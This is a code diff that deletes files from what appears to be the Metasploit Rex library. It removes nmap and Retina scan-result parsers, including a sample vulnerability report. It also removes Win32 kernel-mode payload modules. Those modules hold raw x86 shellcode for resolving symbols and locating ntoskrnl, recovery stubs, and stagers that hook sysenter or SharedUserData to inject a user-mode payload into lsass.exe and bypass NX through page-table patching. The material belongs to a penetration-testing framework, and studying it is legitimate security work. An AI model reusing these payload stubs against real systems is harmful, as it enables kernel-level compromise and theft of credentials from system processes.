- @host["status_reason"] = attributes["reason"]
81
- when "port"
82
- @host["ports"].push(attributes)
83
- when "state"
84
- # <state> refers to the state of a port; values are "open", "closed", or "filtered"
85
- @host["ports"].last["state"] = attributes["state"]
86
- when "service"
87
- # Store any service and script info with the associated port. There shouldn't
88
- # be any collisions on attribute names here, so just merge them.
89
- @host["ports"].last.merge!(attributes)
90
- when "script"
91
- @host["ports"].last["scripts"] ||= {}
92
- @host["ports"].last["scripts"][attributes["id"]] = attributes["output"]
93
- when "trace"
94
- @host["trace"] = {"port" => attributes["port"], "proto" => attributes["proto"], "hops" => [] }
95
- when "hop"
96
- if @host["trace"]
97
- @host["trace"]["hops"].push(attributes)
98
- end
99
- end
100
- end
101
-
102
- def tag_end(name)
103
- case name
104
- when "host"
105
- on_found_host.call(@host) if on_found_host
106
- reset_state
107
- end
108
- end
109
-
110
- # We don't need these methods, but they're necessary to keep REXML happy
111
- def text(str); end
112
- def xmldecl(version, encoding, standalone); end
113
- def cdata; end
114
- def comment(str); end
115
- def instruction(name, instruction); end
116
- def attlist; end
117
- end
118
-
119
- end
120
- end
121
-
@@ -1,109 +0,0 @@
1
- module Rex
2
- module Parser
3
-
4
- # XXX - Retina XML does not include ANY service/port information export
5
- class RetinaXMLStreamParser
6
-
7
- attr_accessor :on_found_host
8
-
9
- def initialize(on_found_host = nil)
10
- reset_state
11
- self.on_found_host = on_found_host if on_found_host
12
- end
13
-
14
- def reset_state
15
- @state = :generic_state
16
- @host = { 'vulns' => [] }
17
- reset_audit_state
18
- end
19
-
20
- def reset_audit_state
21
- @audit = { 'refs' => [] }
22
- end
23
-
24
- def tag_start(name, attributes)
25
- @state = "in_#{name.downcase}".intern
26
- end
27
-
28
- def text(str)
29
- case @state
30
- when :in_ip
31
- @host["address"] = str
32
- when :in_dnsname
33
- @host["hostname"] = str.split(/\s+/).first
34
- when :in_netbiosname
35
- @host["netbios"] = str
36
- when :in_mac
37
- @host["mac"] = str
38
- when :in_os
39
- @host["os"] = str
40
- when :in_rthid
41
- @audit['refs'].push(['RETINA', str])
42
- when :in_cve
43
- str.split(",").each do |cve|
44
- cve = cve.to_s.strip
45
- next if cve.empty?
46
- pre,val = cve.split('-', 2)
47
- next if not val
48
- next if pre != "CVE"
49
- @audit['refs'].push( ['CVE', val] )
50
- end
51
- when :in_name
52
- @audit['name'] = str
53
- when :in_description
54
- @audit['description'] = str
55
- when :in_risk
56
- @audit['risk'] = str
57
- when :in_cce
58
- @audit['cce'] = str
59
- when :in_date
60
- @audit['data'] = str
61
- end
62
- end
63
-
64
- def tag_end(name)
65
- case name
66
- when "host"
67
- on_found_host.call(@host) if on_found_host
68
- reset_state
69
- when "audit"
70
- @host['vulns'].push @audit
71
- reset_audit_state
72
- end
73
- end
74
-
75
- # We don't need these methods, but they're necessary to keep REXML happy
76
- def xmldecl(version, encoding, standalone); end
77
- def cdata; end
78
- def comment(str); end
79
- def instruction(name, instruction); end
80
- def attlist; end
81
- end
82
- end
83
- end
84
-
85
- __END__
86
- <scanJob>
87
- <hosts>
88
- <host>
89
- <ip>10.2.79.98</ip>
90
- <netBIOSName>bsmith-10156B07C</netBIOSName>
91
- <dnsName>bsmith-10156b07c.core.testcorp.com random.testcorp.com</dnsName>
92
- <mac>00:02:29:0E:38:2B</mac>
93
- <os>Windows Server 2003 (X64), Service Pack 2</os>
94
- <audit>
95
- <rthID>7851</rthID>
96
- <cve>CVE-2009-0089,CVE-2009-0550,CVE-2009-0086</cve>
97
- <cce>N/A</cce>
98
- <name>Microsoft Windows HTTP Services Multiple Vulnerabilities (960803)</name>
99
- <description>Microsoft Windows HTTP Services contains multiple vulnerabilities when handling ..</description>
100
- <date>09/15/2010</date>
101
- <risk>Low</risk>
102
- <pciLevel>5 (Urgent)</pciLevel>
103
- <cvssScore>10 [AV:N/AC:L/Au:N/C:C/I:C/A:C]</cvssScore>
104
- <fixInformation>....</fixInformation>
105
- </audit>
106
- </host>
107
- </hosts>
108
- </scanJob>
109
-
data/lib/rex/payloads.rb DELETED
@@ -1 +0,0 @@
1
- require 'rex/payloads/win32'
@@ -1,2 +0,0 @@
1
- require 'rex/payloads/win32/common'
2
- require 'rex/payloads/win32/kernel'
@@ -1,26 +0,0 @@
1
- module Rex
2
- module Payloads
3
- module Win32
4
-
5
- module Common
6
-
7
- #
8
- # Returns a stub that resolves the location of a symbol and then
9
- # calls it. Refer to the following link for more details:
10
- #
11
- # http://uninformed.org/index.cgi?v=3&a=4&p=10
12
- #
13
- def self.resolve_call_sym
14
- "\x60\x31\xc9\x8b\x7d\x3c\x8b\x7c\x3d\x78\x01\xef\x8b" +
15
- "\x57\x20\x01\xea\x8b\x34\x8a\x01\xee\x31\xc0\x99\xac" +
16
- "\xc1\xca\x0d\x01\xc2\x84\xc0\x75\xf6\x41\x66\x39\xda" +
17
- "\x75\xe3\x49\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b" +
18
- "\x5f\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c" +
19
- "\x61\xff\xe0"
20
- end
21
-
22
- end
23
-
24
- end
25
- end
26
- end
@@ -1,53 +0,0 @@
1
- module Rex
2
- module Payloads
3
- module Win32
4
-
5
- require 'rex/payloads/win32/kernel/common'
6
- require 'rex/payloads/win32/kernel/recovery'
7
- require 'rex/payloads/win32/kernel/stager'
8
- require 'rex/payloads/win32/kernel/migration'
9
-
10
- module Kernel
11
-
12
- #
13
- # Constructs a kernel-mode payload using the supplied options. The options
14
- # can be:
15
- #
16
- # Recovery : The recovery method to use, such as 'spin'.
17
- # Stager : The stager method to use, such as 'sud_syscall_hook'.
18
- # RecoveryStub : The recovery stub that should be used, if any.
19
- # UserModeStub : The user-mode payload to execute, if any.
20
- # KernelModeStub: The kernel-mode payload to execute, if any.
21
- #
22
- def self.construct(opts = {})
23
- payload = nil
24
-
25
- # Generate the recovery stub
26
- if opts['Recovery'] and Kernel::Recovery.respond_to?(opts['Recovery'])
27
- opts['RecoveryStub'] = Kernel::Recovery.send(opts['Recovery'], opts)
28
- end
29
-
30
- # Append supplied recovery stub information in case there is some
31
- # context specific recovery that must be done.
32
- if opts['AppendRecoveryStub']
33
- opts['RecoveryStub'] = (opts['RecoveryStub'] || '') + opts['AppendRecoveryStub']
34
- end
35
-
36
- # Generate the stager
37
- if opts['Stager'] and Kernel::Stager.respond_to?(opts['Stager'])
38
- payload = Kernel::Stager.send(opts['Stager'], opts)
39
- # Or, generate the migrator
40
- elsif opts['Migrator'] and Kernel::Migration.respond_to?(opts['Migrator'])
41
- payload = Kernel::Migration.send(opts['Migrator'], opts)
42
- else
43
- raise ArgumentError, "A stager or a migrator must be specified."
44
- end
45
-
46
- payload
47
- end
48
-
49
- end
50
-
51
- end
52
- end
53
- end
@@ -1,54 +0,0 @@
1
- module Rex
2
- module Payloads
3
- module Win32
4
- module Kernel
5
-
6
- require 'rex/payloads/win32/common'
7
-
8
- #
9
- # This class provides common methods that may be shared across more than
10
- # one kernel-mode payload. Many of these are from the following paper:
11
- #
12
- # http://www.uninformed.org/?v=3&a=4&t=sumry
13
- #
14
- module Common
15
-
16
- #
17
- # Returns a stub that will find the base address of ntoskrnl and
18
- # place it in eax. This method works by using an IDT entry. Credit
19
- # to eEye.
20
- #
21
- def self.find_nt_idt_eeye
22
- "\x8b\x35\x38\xf0\xdf\xff\xad\xad\x48\x81\x38\x4d\x5a\x90\x00\x75\xf7"
23
- end
24
-
25
- #
26
- # Returns a stub that will find the base address of ntoskrnl and
27
- # place it in eax. This method uses a pointer found in KdVersionBlock.
28
- #
29
- def self.find_nt_kdversionblock
30
- "\x31\xc0\x64\x8b\x40\x34\x8b\x40\x10"
31
- end
32
-
33
- #
34
- # Returns a stub that will find the base address of ntoskrnl and
35
- # place it in eax. This method uses a pointer found in the
36
- # processor control region as a starting point.
37
- #
38
- def self.find_nt_pcr
39
- "\xa1\x2c\xf1\xdf\xff\x66\x25\x01\xf0\x48\x66\x81\x38\x4d\x5a\x75\xf4"
40
- end
41
-
42
- #
43
- # Alias for resolving symbols.
44
- #
45
- def self.resolve_call_sym
46
- Rex::Payloads::Win32::Common.resolve_call_sym
47
- end
48
-
49
- end
50
-
51
- end
52
- end
53
- end
54
- end
@@ -1,12 +0,0 @@
1
- module Rex
2
- module Payloads
3
- module Win32
4
- module Kernel
5
-
6
- module Migration
7
- end
8
-
9
- end
10
- end
11
- end
12
- end
@@ -1,50 +0,0 @@
1
- module Rex
2
- module Payloads
3
- module Win32
4
- module Kernel
5
-
6
- #
7
- # Recovery stubs are responsible for ensuring that the kernel does not crash.
8
- # They must 'recover' after the exploit has succeeded, either by consuming
9
- # the thread or continuing it on with its normal execution. Recovery stubs
10
- # will often be exploit dependent.
11
- #
12
- module Recovery
13
-
14
- #
15
- # The default recovery method is to spin the thread
16
- #
17
- def self.default(opts = {})
18
- spin(opts)
19
- end
20
-
21
- #
22
- # Infinite 'hlt' loop.
23
- #
24
- def self.spin(opts = {})
25
- "\xf4\xeb\xfd"
26
- end
27
-
28
- #
29
- # Restarts the idle thread by jumping back to the entry point of
30
- # KiIdleLoop. This requires a hard-coded address of KiIdleLoop.
31
- # You can pass the 'KiIdleLoopAddress' in the options hash.
32
- #
33
- def self.idlethread_restart(opts = {})
34
- # Default to fully patched XPSP2
35
- opts['KiIdleLoopAddress'] = 0x804dbb27 if opts['KiIdleLoopAddress'].nil?
36
-
37
- "\x31\xC0" + # xor eax,eax
38
- "\x64\xC6\x40\x24\x02" + # mov byte [fs:eax+0x24],0x2
39
- "\x8B\x1D\x1C\xF0\xDF\xFF" + # mov ebx,[0xffdff01c]
40
- "\xB8" + [opts['KiIdleLoopAddress']].pack('V') + # mov eax, 0x804dbb27
41
- "\x6A\x00" + # push byte +0x0
42
- "\xFF\xE0" # jmp eax
43
- end
44
-
45
- end
46
-
47
- end
48
- end
49
- end
50
- end
@@ -1,194 +0,0 @@
1
- module Rex
2
- module Payloads
3
- module Win32
4
- module Kernel
5
-
6
- #
7
- # Stagers are responsible for reading in another payload and executing it.
8
- # The reading in of the payload may actually be as simple as copying it to
9
- # another location. The executing of it may be done either directly or
10
- # indirectly.
11
- #
12
- module Stager
13
-
14
- #
15
- # Works on Vista, Server 2008 and 7.
16
- #
17
- # Full assembly source at:
18
- # /msf3/external/source/shellcode/windows/x86/src/kernel/stager_sysenter_hook.asm
19
- #
20
- # This payload works as follows:
21
- # * Our sysenter handler and ring3 stagers are copied over to safe location.
22
- # * The SYSENTER_EIP_MSR is patched to point to our sysenter handler.
23
- # * The ring0 thread we are in is placed in a halted state.
24
- # * Upon any ring3 proces issuing a sysenter command our ring0 sysenter handler gets control.
25
- # * The ring3 return address is modified to force our ring3 stub to be called if certain conditions met.
26
- # * If NX is enabled we patch the respective page table entry to disable it for the ring3 code.
27
- # * Control is passed to real sysenter handler, upon the real sysenter handler finishing, sysexit will return to our ring3 stager.
28
- # * If the ring3 stager is executing in the desired process our sysenter handler is removed and the real ring3 payload called.
29
- #
30
- def self.stager_sysenter_hook( opts = {} )
31
-
32
- # The page table entry for StagerAddressUser, used to bypass NX in ring3 on PAE enabled systems (should be static).
33
- pagetable = opts['StagerAddressPageTable'] || 0xC03FFF00
34
-
35
- # The address in kernel memory where we place our ring0 and ring3 stager (no ASLR).
36
- kstager = opts['StagerAddressKernel'] || 0xFFDF0400
37
-
38
- # The address in shared memory (addressable from ring3) where we can find our ring3 stager (no ASLR).
39
- ustager = opts['StagerAddressUser'] || 0x7FFE0400
40
-
41
- # Target SYSTEM process to inject ring3 payload into.
42
- process = (opts['RunInWin32Process'] || 'lsass.exe').unpack('C*')
43
-
44
- # A simple hash of the process name based on the first 4 wide chars.
45
- # Assumes process is located at '*:\windows\system32\'.
46
- checksum = process[0] + ( process[2] << 8 ) + ( process[1] << 16 ) + ( process[3] << 24 )
47
-
48
- # The ring0 -> ring3 payload blob.
49
- r0 = "\xFC\xFA\xEB\x1E\x5E\x68\x76\x01\x00\x00\x59\x0F\x32\x89\x46\x60" +
50
- "\x8B\x7E\x64\x89\xF8\x0F\x30\xB9\x41\x41\x41\x41\xF3\xA4\xFB\xF4" +
51
- "\xEB\xFD\xE8\xDD\xFF\xFF\xFF\x6A\x00\x9C\x60\xE8\x00\x00\x00\x00" +
52
- "\x58\x8B\x58\x57\x89\x5C\x24\x24\x81\xF9\xDE\xC0\xAD\xDE\x75\x10" +
53
- "\x68\x76\x01\x00\x00\x59\x89\xD8\x31\xD2\x0F\x30\x31\xC0\xEB\x34" +
54
- "\x8B\x32\x0F\xB6\x1E\x66\x81\xFB\xC3\x00\x75\x28\x8B\x58\x5F\x8D" +
55
- "\x5B\x6C\x89\x1A\xB8\x01\x00\x00\x80\x0F\xA2\x81\xE2\x00\x00\x10" +
56
- "\x00\x74\x11\xBA\x45\x45\x45\x45\x81\xC2\x04\x00\x00\x00\x81\x22" +
57
- "\xFF\xFF\xFF\x7F\x61\x9D\xC3\xFF\xFF\xFF\xFF\x42\x42\x42\x42\x43" +
58
- "\x43\x43\x43\x60\x6A\x30\x58\x99\x64\x8B\x18\x39\x53\x0C\x74\x2E" +
59
- "\x8B\x43\x10\x8B\x40\x3C\x83\xC0\x28\x8B\x08\x03\x48\x03\x81\xF9" +
60
- "\x44\x44\x44\x44\x75\x18\xE8\x0A\x00\x00\x00\xE8\x10\x00\x00\x00" +
61
- "\xE9\x09\x00\x00\x00\xB9\xDE\xC0\xAD\xDE\x89\xE2\x0F\x34\x61\xC3"
62
-
63
- # The ring3 payload.
64
- r3 = ''
65
- r3 += _createthread() if opts['CreateThread'] == true
66
- r3 += opts['UserModeStub'] || ''
67
-
68
- # Patch in the required values.
69
- r0 = r0.gsub( [ 0x41414141 ].pack("V"), [ ( r0.length + r3.length - 0x1C ) ].pack("V") )
70
- r0 = r0.gsub( [ 0x42424242 ].pack("V"), [ kstager ].pack("V") )
71
- r0 = r0.gsub( [ 0x43434343 ].pack("V"), [ ustager ].pack("V") )
72
- r0 = r0.gsub( [ 0x44444444 ].pack("V"), [ checksum ].pack("V") )
73
- r0 = r0.gsub( [ 0x45454545 ].pack("V"), [ pagetable ].pack("V") )
74
-
75
- # Return the ring0 -> ring3 payload blob with the real ring3 payload appended.
76
- return r0 + r3
77
- end
78
-
79
- #
80
- # XP SP2/2K3 SP1 ONLY
81
- #
82
- # Returns a kernel-mode stager that transitions from r0 to r3 by placing
83
- # code in an unused portion of SharedUserData and then pointing the
84
- # SystemCall attribute to that unused portion. This has the effect of
85
- # causing the custom code to be called every time a user-mode process
86
- # tries to make a system call. The returned payload also checks to make
87
- # sure that it's running in the context of lsass before actually running
88
- # the embedded payload.
89
- #
90
- def self.sud_syscall_hook(opts = {})
91
- r0_recovery = opts['RecoveryStub'] || Recovery.default
92
- r3_payload = opts['UserModeStub'] || ''
93
- r3_prefix = _run_only_in_win32proc_stub("\xff\x25\x08\x03\xfe\x7f", opts)
94
- r3_size = ((r3_prefix.length + r3_payload.length + 3) & ~0x3) / 4
95
-
96
- r0_stager =
97
- "\xEB" + [0x22 + r0_recovery.length].pack('C') + # jmp short 0x27
98
- "\xBB\x01\x03\xDF\xFF" + # mov ebx,0xffdf0301
99
- "\x4B" + # dec ebx
100
- "\xFC" + # cld
101
- "\x8D\x7B\x7C" + # lea edi,[ebx+0x7c]
102
- "\x5E" + # pop esi
103
- "\x6A" + [r3_size].pack('C') + # push byte num_dwords
104
- "\x59" + # pop ecx
105
- "\xF3\xA5" + # rep movsd
106
- "\xBF\x7C\x03\xFE\x7F" + # mov edi,0x7ffe037c
107
- "\x39\x3B" + # cmp [ebx],edi
108
- "\x74\x09" + # jz
109
- "\x8B\x03" + # mov eax,[ebx]
110
- "\x8D\x4B\x08" + # lea ecx,[ebx+0x8]
111
- "\x89\x01" + # mov [ecx],eax
112
- "\x89\x3B" + # mov [ebx],edi
113
- r0_recovery +
114
- "\xe8" + [0xffffffd9 - r0_recovery.length].pack('V') + # call 0x2
115
- r3_prefix +
116
- r3_payload
117
-
118
- return r0_stager
119
- end
120
-
121
- protected
122
-
123
- #
124
- # Stub to run a prepended ring3 payload in a new thread.
125
- #
126
- # Full assembly source at:
127
- # /msf3/external/source/shellcode/windows/x86/src/single/createthread.asm
128
- #
129
- def self._createthread
130
- r3 = "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
131
- "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
132
- "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
133
- "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
134
- "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
135
- "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
136
- "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
137
- "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
138
- "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
139
- "\x31\xC0\x50\x50\x50\x8D\x9D\xA0\x00\x00\x00\x53\x50\x50\x68\x38" +
140
- "\x68\x0D\x16\xFF\xD5\xC3\x58"
141
- return r3
142
- end
143
-
144
- #
145
- # This stub is used by stagers to check to see if the code is
146
- # running in the context of a user-mode system process. By default,
147
- # this process is lsass.exe. If it isn't, it runs the code
148
- # specified by append. Otherwise, it jumps past that code and
149
- # into what should be the expected r3 payload to execute. This
150
- # stub also makes sure that the payload does not run more than
151
- # once.
152
- #
153
- def self._run_only_in_win32proc_stub(append = '', opts = {})
154
- opts['RunInWin32Process'] = "lsass.exe" if opts['RunInWin32Process'].nil?
155
-
156
- process = opts['RunInWin32Process'].downcase
157
- checksum =
158
- process[0] +
159
- (process[2] << 8) +
160
- (process[1] << 16) +
161
- (process[3] << 24)
162
-
163
- "\x60" + # pusha
164
- "\x6A\x30" + # push byte +0x30
165
- "\x58" + # pop eax
166
- "\x99" + # cdq
167
- "\x64\x8B\x18" + # mov ebx,[fs:eax]
168
- "\x39\x53\x0C" + # cmp [ebx+0xc],edx
169
- "\x74\x26" + # jz 0x5f
170
- "\x8B\x5B\x10" + # mov ebx,[ebx+0x10]
171
- "\x8B\x5B\x3C" + # mov ebx,[ebx+0x3c]
172
- "\x83\xC3\x28" + # add ebx,byte +0x28
173
- "\x8B\x0B" + # mov ecx,[ebx]
174
- "\x03\x4B\x03" + # add ecx,[ebx+0x3]
175
- "\x81\xF9" + [checksum].pack('V') + # cmp ecx,prochash
176
- "\x75\x10" + # jnz 0x5f
177
- "\x64\x8B\x18" + # mov ebx,[fs:eax]
178
- "\x43" + # inc ebx
179
- "\x43" + # inc ebx
180
- "\x43" + # inc ebx
181
- "\x80\x3B\x01" + # cmp byte [ebx],0x1
182
- "\x74\x05" + # jz 0x5f
183
- "\xC6\x03\x01" + # mov byte [ebx],0x1
184
- "\xEB" + [append.length + 1].pack('C') + # jmp stager
185
- "\x61" + append # restore regs
186
- end
187
-
188
-
189
- end
190
-
191
- end
192
- end
193
- end
194
- end